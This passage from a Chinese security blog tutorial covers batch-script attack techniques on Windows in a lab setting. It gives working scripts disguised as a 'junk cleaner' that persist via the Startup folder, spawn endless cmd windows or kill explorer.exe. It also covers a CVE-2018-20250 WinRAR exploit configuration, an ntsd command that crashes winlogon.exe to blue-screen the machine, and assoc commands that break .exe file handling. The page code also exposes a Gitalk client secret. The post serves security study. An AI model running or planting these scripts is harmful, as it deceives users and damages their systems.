&quot;%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&quot;&gt;nul</span><br><span class="line">if %errorlevel%==0 goto next</span><br><span class="line"></span><br><span class="line">::Win 7以下运行这个命令</span><br><span class="line">copy C:\Users\Leong\Desktop\clean.bat &quot;%USERPROFILE%\「开始」菜单\程序\启动\&quot;&gt;nul</span><br><span class="line">if %errorlevel%==0 goto next</span><br><span class="line"></span><br><span class="line">:error</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo 	======程序运行失败，请【使用管理员权限】重新运行！======</span><br><span class="line">echo.</span><br><span class="line">pause</span><br><span class="line"></span><br><span class="line">:next</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo 	=========垃圾清理中，请不要关闭窗口=========</span><br><span class="line">echo.</span><br><span class="line">::ping在这里的作用是延长时间，伪装在清理垃圾</span><br><span class="line">ping -n 5 127.0.0.1&gt;nul</span><br><span class="line">echo.</span><br><span class="line">echo 	=========垃圾清理完毕,共清理垃圾500M=======</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo 	=========建议立即重启电脑==========</span><br><span class="line"></span><br><span class="line">echo start cmd &gt; &quot;%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clean.bat&quot;</span><br><span class="line">echo &quot;%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clean.bat&quot; &gt;&gt; &quot;%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clean.bat&quot;</span><br><span class="line"></span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>血的教训，最好把路径用引号括起来，否则可能执行不成功。</p>
<p>“以管理员身份运行”，在Win 7中其实普通用户也可以。</p>
<img src="/posts/82a69c8b/2.1.2.png" class="" title="显示结果">
<p>检查自启动目录是否创建了批处理脚本，双击它的确能不断打开CMD占用系统资源。</p>
<img src="/posts/82a69c8b/2.1.3.png" class="" title="自启动目录的clean.bat">
<p>现在重启电脑测试是否能实现自启动。完美！</p>
<img src="/posts/82a69c8b/2.1.4.png" class="" title="显示结果">
<h2 id="2-2-WinRAR恶意劫持自启动-CVE-2018-20250"><a href="#2-2-WinRAR恶意劫持自启动-CVE-2018-20250" class="headerlink" title="2.2 WinRAR恶意劫持自启动(CVE-2018-20250)"></a>2.2 WinRAR恶意劫持自启动(CVE-2018-20250)</h2><h3 id="2-2-1-漏洞描述"><a href="#2-2-1-漏洞描述" class="headerlink" title="2.2.1 漏洞描述"></a>2.2.1 漏洞描述</h3><p>WinRAR漏洞(CVE-2018-20250)是Check Point团队于2019年2月爆出的严重安全漏洞，该漏洞已存在于WinRAR中19年，是APT攻击中非常经典的漏洞。它是由于WinRAR使用一个陈旧的<code>UNACEV2.dll</code>动态链接库造成的。当我们解压任意ACE文件时，由于没有对文件名进行充分过滤，导致其可实现目录穿越，将恶意软件写入操作系统自启动文件夹，导致电脑重启时会自动运行该程序，从而造成恶意软件劫持。</p>
<h3 id="2-2-2-影响范围"><a href="#2-2-2-影响范围" class="headerlink" title="2.2.2 影响范围"></a>2.2.2 影响范围</h3><p>该漏洞会对多种压缩软件造成影响，版本如下：</p>
<ul>
<li>WinRAR &lt; v5.70 Beta 1</li>
<li>Bandizip &lt;= v6.2.0.0</li>
<li>好压(245压缩) &lt;= v5.9.8.10907</li>
<li>360压缩 &lt;= v4.0.0.1170</li>
</ul>
<h3 id="2-2-3-漏洞复现"><a href="#2-2-3-漏洞复现" class="headerlink" title="2.2.3 漏洞复现"></a>2.2.3 漏洞复现</h3><h4 id="2-2-3-1-环境配置"><a href="#2-2-3-1-环境配置" class="headerlink" title="2.2.3.1 环境配置"></a>2.2.3.1 环境配置</h4><p>攻击机：Windows 10 家庭版 x64</p>
<p>靶机：Windows 10 教育版 x64</p>
<p>利用工具：<a target="_blank" rel="noopener" href="https://github.com/backlion/CVE-2018-20250">https://github.com/backlion/CVE-2018-20250</a></p>
<h4 id="2-2-3-2-复现准备"><a href="#2-2-3-2-复现准备" class="headerlink" title="2.2.3.2 复现准备"></a>2.2.3.2 复现准备</h4><p>在靶机上下载好<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/16eL9rA1gj9FdoBmLh3oieg">WinRAR v5.4</a>(提取码：lo3r)，安装之后可以看到本地WinRAR目录下的<code>UNACEV2.dll</code>动态链接库，这个就是被利用的入口。</p>
<img src="/posts/82a69c8b/2.1.5.png" class="" title="UNACEV2.dll">
<p>下载CVE-2018-20250漏洞利用工具。解压出来如下：</p>
<ul>
<li><code>README.md</code>是漏洞利用说明书，告诉我们哪些参数可以修改、如何运行exp以及漏洞被利用的后果</li>
<li><code>hello.txt</code>和<code>world.txt</code>是需要压缩的文件</li>
<li><code>calc.exe</code>是计算器，可以替换成恶意软件，它会被定向植入系统自启动目录</li>
<li><code>exp.py</code>是运行的Python代码，它会将<code>hello.txt</code>和<code>world.txt</code>压缩，并隐藏恶意软件</li>
<li><code>acefile.py</code>是利用<code>UNACEV2.dll</code>漏洞的代码，共4000多行</li>
</ul>
<img src="/posts/82a69c8b/2.2.1.png" class="" title="漏洞利用工具">
<h4 id="2-2-3-3-复现过程"><a href="#2-2-3-3-复现过程" class="headerlink" title="2.2.3.3 复现过程"></a>2.2.3.3 复现过程</h4><p>如果想要修改恶意文件、压缩文件名称、放在启动目录的文件名称等等，可以通过编辑<code>exp.py</code>实现。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="comment"># The archive filename you want</span></span><br><span class="line">rar_filename = <span class="string">&quot;test.rar&quot;</span></span><br><span class="line"><span class="comment"># The evil file you want to run</span></span><br><span class="line">evil_filename = <span class="string">&quot;calc.exe&quot;</span></span><br><span class="line"><span class="comment"># The decompression path you want, such shown below</span></span><br><span class="line">target_filename = <span class="string">r&quot;C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe&quot;</span></span><br><span class="line"><span class="comment"># Other files to be displayed when the victim opens the winrar</span></span><br><span class="line"><span class="comment"># filename_list=[]</span></span><br><span class="line">filename_list = [<span class="string">&quot;hello.txt&quot;</span>, <span class="string">&quot;world.txt&quot;</span>]</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>运行<code>exp.py</code>，将生成的<code>test.rar</code>发送到靶机中。</p>
<img src="/posts/82a69c8b/2.2.2.png" class="" title="test.rar">
<p>笑死，被发现了。为了实验，将它从隔离区拿出来。</p>
<img src="/posts/82a69c8b/2.2.3.png" class="" title="安全威胁提示">
<p>查看压缩包发现里面不仅有<code>hello.txt</code>和<code>world.txt</code>，还有一个本地磁盘路径，点进去发现就是在自启动目录下放置的<code>hi.exe</code>。(这真的太明显了吧！！)</p>
<img src="/posts/82a69c8b/2.2.4.png" class="" title="查看压缩包">
<p>注意：当用户解压文件时，其解压目录必须是<code>C:\Users\当前用户</code>目录下。</p>
<p>当用户解压完后，会在自启动目录生成一个<code>hi.exe</code>，也就是<code>calc.exe</code>。在系统重启后会自动打开<code>calc.exe</code>。</p>
<img src="/posts/82a69c8b/2.2.5.png" class="" title="自启动目录">
<h2 id="2-3-恶意自启动防御"><a href="#2-3-恶意自启动防御" class="headerlink" title="2.3 恶意自启动防御"></a>2.3 恶意自启动防御</h2><p>自启动防御可以看<a target="_blank" rel="noopener" href="https://v5le0n9.github.io/posts/a48809a5.html#3-2-检查启动项">熊猫烧香病毒的行为机理分析 3.2 检查启动项</a>，在WinRAR恶意劫持自启动漏洞中，可通过删除自启动目录下的恶意软件实现防御。</p>
<h1 id="3-进程关闭脚本"><a href="#3-进程关闭脚本" class="headerlink" title="3. 进程关闭脚本"></a>3. 进程关闭脚本</h1><p>继续编写一个伪装成“系统垃圾清理”的程序，它其实是一个进程关闭程序，试着关闭桌面进程。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">title 系统垃圾清理</span><br><span class="line">color 2f</span><br><span class="line">echo 	=====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】====</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo 	=====垃圾清理中，请不要关闭窗口=========</span><br><span class="line">echo.</span><br><span class="line">ping -n 5 127.0.0.1&gt;nul</span><br><span class="line">taskkill /im explorer.exe /f &gt;nul</span><br><span class="line">echo.</span><br><span class="line">echo 	=====拐了，你的系统已经废了=======</span><br><span class="line">echo.</span><br><span class="line">ping -n 5 127.0.0.1&gt;nul</span><br><span class="line">echo.</span><br><span class="line">start c:\windows\explorer.exe</span><br><span class="line">echo.</span><br><span class="line">echo 	=====已经修复好！是不是吓坏了！！O(∩_∩)O==========</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>运行该批处理程序，桌面会消失，过一会儿桌面又会恢复。</p>
<h1 id="4-蓝屏攻击机理"><a href="#4-蓝屏攻击机理" class="headerlink" title="4. 蓝屏攻击机理"></a>4. 蓝屏攻击机理</h1><p>蓝屏死机称为BSOD(Blue Screen of Death)，也是常见的攻击行为，尤其是某些CVE漏洞复现过程，在进行提权尝试前都会先实现蓝屏攻击功能，危害极大。</p>
<h2 id="4-1-批处理脚本实现蓝屏攻击"><a href="#4-1-批处理脚本实现蓝屏攻击" class="headerlink" title="4.1 批处理脚本实现蓝屏攻击"></a>4.1 批处理脚本实现蓝屏攻击</h2><p>实现蓝屏的命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntsd -c q -pn winlogon.exe</span><br></pre></td></tr></table></figure>
<p>ntsd是一个用户态进程调试工具，从Windows 2000就开始被附随在System32目录下。它能够结束除<code>System</code>、<code>smss.exe</code>、<code>csrss.exe</code>、<code>lsass.exe</code>及各种<code>rootkit</code>程序外所有的程序。但在Windows Vista(06年发布)及以上版本的Windows中不含ntsd，必须手动下载至电脑中才可使用。</p>
<p>为了方便，直接使用Windows 2003实验。制作成批处理脚本或直接在CMD窗口输入命令，主机直接蓝屏并重启。(重启太快了没有蓝屏截图)</p>
<p>Windows Logon Process(即<code>winlogon.exe</code>)，是Windows NT 用户登录程序，用于管理用户登录和退出。该进程的正常路径应是<code>C:\Windows\System32</code>，且是以 SYSTEM 用户运行。</p>
<h2 id="4-2-ntsd命令常用参数"><a href="#4-2-ntsd命令常用参数" class="headerlink" title="4.2 ntsd命令常用参数"></a>4.2 ntsd命令常用参数</h2><img src="/posts/82a69c8b/4.2.1.png" class="" title="ntsd常用参数">
<p>-c “<command>“表示c参数后面紧接命令，如上面的“q”应该是退出命令。</p>
<h2 id="4-3-结束进程的几种方法"><a href="#4-3-结束进程的几种方法" class="headerlink" title="4.3 结束进程的几种方法"></a>4.3 结束进程的几种方法</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">//利用进程的PID结束进程</span><br><span class="line">ntsd -c q -p PID</span><br><span class="line"></span><br><span class="line">//利用进程名结束进程</span><br><span class="line">ntsd -c q -pn xxxx.exe</span><br><span class="line"></span><br><span class="line">//利用taskkill命令强制终止进程</span><br><span class="line">taskkill /f /im PID</span><br><span class="line">taskkill /f /im xxxx.exe </span><br><span class="line"></span><br><span class="line">//利用tskill命令结束进程</span><br><span class="line">tskill PID</span><br><span class="line">//xxxx不能带有后缀名</span><br><span class="line">tskill xxxx</span><br></pre></td></tr></table></figure>
<h1 id="5-简单的扩展名修改恶意攻击"><a href="#5-简单的扩展名修改恶意攻击" class="headerlink" title="5. 简单的扩展名修改恶意攻击"></a>5. 简单的扩展名修改恶意攻击</h1><p>将文件格式修改或文档加密都是常见的病毒，比如永恒之蓝、勒索病毒等，它们就是将电脑内的所有资料、文档加密。当用户打开文件时需要密码，此时通过比特币付费进行勒索。</p>
<p>编写批处理脚本，当遇到可执行的EXE文件认为它是一个TXT文档，系统默认用记事本打开导致可执行文件运行不起来。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assoc.exe=txtfile</span><br></pre></td></tr></table></figure>
<p>“以管理员身份运行”，EXE文件被当作TXT文件打开。</p>
<img src="/posts/82a69c8b/5.1.1.png" class="">
<p>其它格式文件转换为TXT文件如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">assoc .htm=txtfile</span><br><span class="line">assoc .dat=txtfile</span><br><span class="line">assoc .com=txtfile</span><br><span class="line">assoc .rar=txtfile</span><br><span class="line">assoc .gho=txtfile</span><br><span class="line">assoc .mvb=txtfile</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>此时，如果用户隐藏文件扩展名，甚至可以修改图标伪装成目标应用，当用户点击时会执行这些破坏。但由于不知道目标是否有隐藏扩展名，还是不建议这种“笨”方法。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="v5le0n9 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="v5le0n9 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/8464a317.html" rel="prev" title="决策树之CART算法">
      <i class="fa fa-chevron-left"></i> 决策树之CART算法
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/772b88a4.html" rel="next" title="宏病毒攻防机理">
      宏病毒攻防机理 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E6%89%B9%E5%A4%84%E7%90%86%E7%97%85%E6%AF%92%E6%9C%BA%E7%90%86"><span class="nav-text">1. 批处理病毒机理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81%E5%92%8C%E5%AE%9A%E6%97%B6%E5%85%B3%E6%9C%BA%E8%84%9A%E6%9C%AC"><span class="nav-text">1.1 修改密码和定时关机脚本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E9%98%B2%E5%BE%A1%E6%9C%BA%E5%88%B6"><span class="nav-text">1.2 脚本病毒防御机制</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E8%87%AA%E5%90%AF%E5%8A%A8%E6%81%B6%E6%84%8F%E6%94%BB%E5%87%BB%E6%9C%BA%E7%90%86"><span class="nav-text">2. 自启动恶意攻击机理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-BAT%E8%84%9A%E6%9C%AC%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%90%AF%E5%8A%A8"><span class="nav-text">2.1 BAT脚本实现自启动</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-WinRAR%E6%81%B6%E6%84%8F%E5%8A%AB%E6%8C%81%E8%87%AA%E5%90%AF%E5%8A%A8-CVE-2018-20250"><span class="nav-text">2.2 WinRAR恶意劫持自启动(CVE-2018-20250)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-1-%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-text">2.2.1 漏洞描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-2-%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="nav-text">2.2.2 影响范围</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-3-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-text">2.2.3 漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2-3-1-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-text">2.2.3.1 环境配置</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2-3-2-%E5%A4%8D%E7%8E%B0%E5%87%86%E5%A4%87"><span class="nav-text">2.2.3.2 复现准备</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2-3-3-%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="nav-text">2.2.3.3 复现过程</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-3-%E6%81%B6%E6%84%8F%E8%87%AA%E5%90%AF%E5%8A%A8%E9%98%B2%E5%BE%A1"><span class="nav-text">2.3 恶意自启动防御</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-%E8%BF%9B%E7%A8%8B%E5%85%B3%E9%97%AD%E8%84%9A%E6%9C%AC"><span class="nav-text">3. 进程关闭脚本</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-%E8%93%9D%E5%B1%8F%E6%94%BB%E5%87%BB%E6%9C%BA%E7%90%86"><span class="nav-text">4. 蓝屏攻击机理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E6%89%B9%E5%A4%84%E7%90%86%E8%84%9A%E6%9C%AC%E5%AE%9E%E7%8E%B0%E8%93%9D%E5%B1%8F%E6%94%BB%E5%87%BB"><span class="nav-text">4.1 批处理脚本实现蓝屏攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-ntsd%E5%91%BD%E4%BB%A4%E5%B8%B8%E7%94%A8%E5%8F%82%E6%95%B0"><span class="nav-text">4.2 ntsd命令常用参数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-3-%E7%BB%93%E6%9D%9F%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E6%B3%95"><span class="nav-text">4.3 结束进程的几种方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-%E7%AE%80%E5%8D%95%E7%9A%84%E6%89%A9%E5%B1%95%E5%90%8D%E4%BF%AE%E6%94%B9%E6%81%B6%E6%84%8F%E6%94%BB%E5%87%BB"><span class="nav-text">5. 简单的扩展名修改恶意攻击</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="v5le0n9"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">v5le0n9</p>
  <div class="site-description" itemprop="description">小呀小二郎呀背着个书包上学堂</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">69</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/Leong_Vinson" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;Leong_Vinson" rel="noopener" target="_blank"><i class="fab fa-cuttlefish fa-fw"></i>CSDN</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://github.com/v5le0n9" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;v5le0n9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:v5le0n9@163.com" title="E-Mail → mailto:v5le0n9@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.zz1syyd.com/" title="https:&#x2F;&#x2F;www.zz1syyd.com&#x2F;" rel="noopener" target="_blank">zz1syyd</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://one-null-pointer.github.io/" title="https:&#x2F;&#x2F;one-null-pointer.github.io&#x2F;" rel="noopener" target="_blank">liaoyue</a>
        </li>
    </ul>
  </div>

      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">v5le0n9</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.4m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">20:42</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
          load: ['[tex]/mhchem'],
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
          packages: {'[+]': ['mhchem']},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '7c58e80079a2457b610d',
      clientSecret: 'fc16b1b0fdfb278016ebe41c20f3743c3c927466',
      repo        : 'comments.github.io',
      owner       : 'v5le0n9',
      admin       : ['v5le0n9'],
      id          : 'c3d37cad1cc8145793fd9553879ed78c',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
